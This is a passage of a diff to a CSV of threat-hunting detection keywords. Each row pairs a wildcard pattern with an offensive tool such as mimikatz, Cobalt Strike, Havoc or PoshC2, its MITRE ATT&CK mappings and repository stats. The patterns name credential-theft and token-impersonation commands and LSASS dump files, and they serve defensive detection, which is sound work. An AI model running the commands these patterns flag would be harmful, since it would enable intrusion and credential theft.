lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*timing_attack * --brute-force*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*timwhitez/Doge-Loader*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" -"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*tls-scanner -connect *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -17739,37 +17923,37 @@ "*tmp*ciscophones.tgz*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*tmp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*Tmprovider.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*toggle_privileges.cna*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*toggle_privileges_bof.*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*Toggle_Token_Privileges_BOF*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*ToggleWDigest*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" -"*token find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*token find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*token* -CreateProcess * -ProcessId *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token* -ImpersonateUser -Username *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" 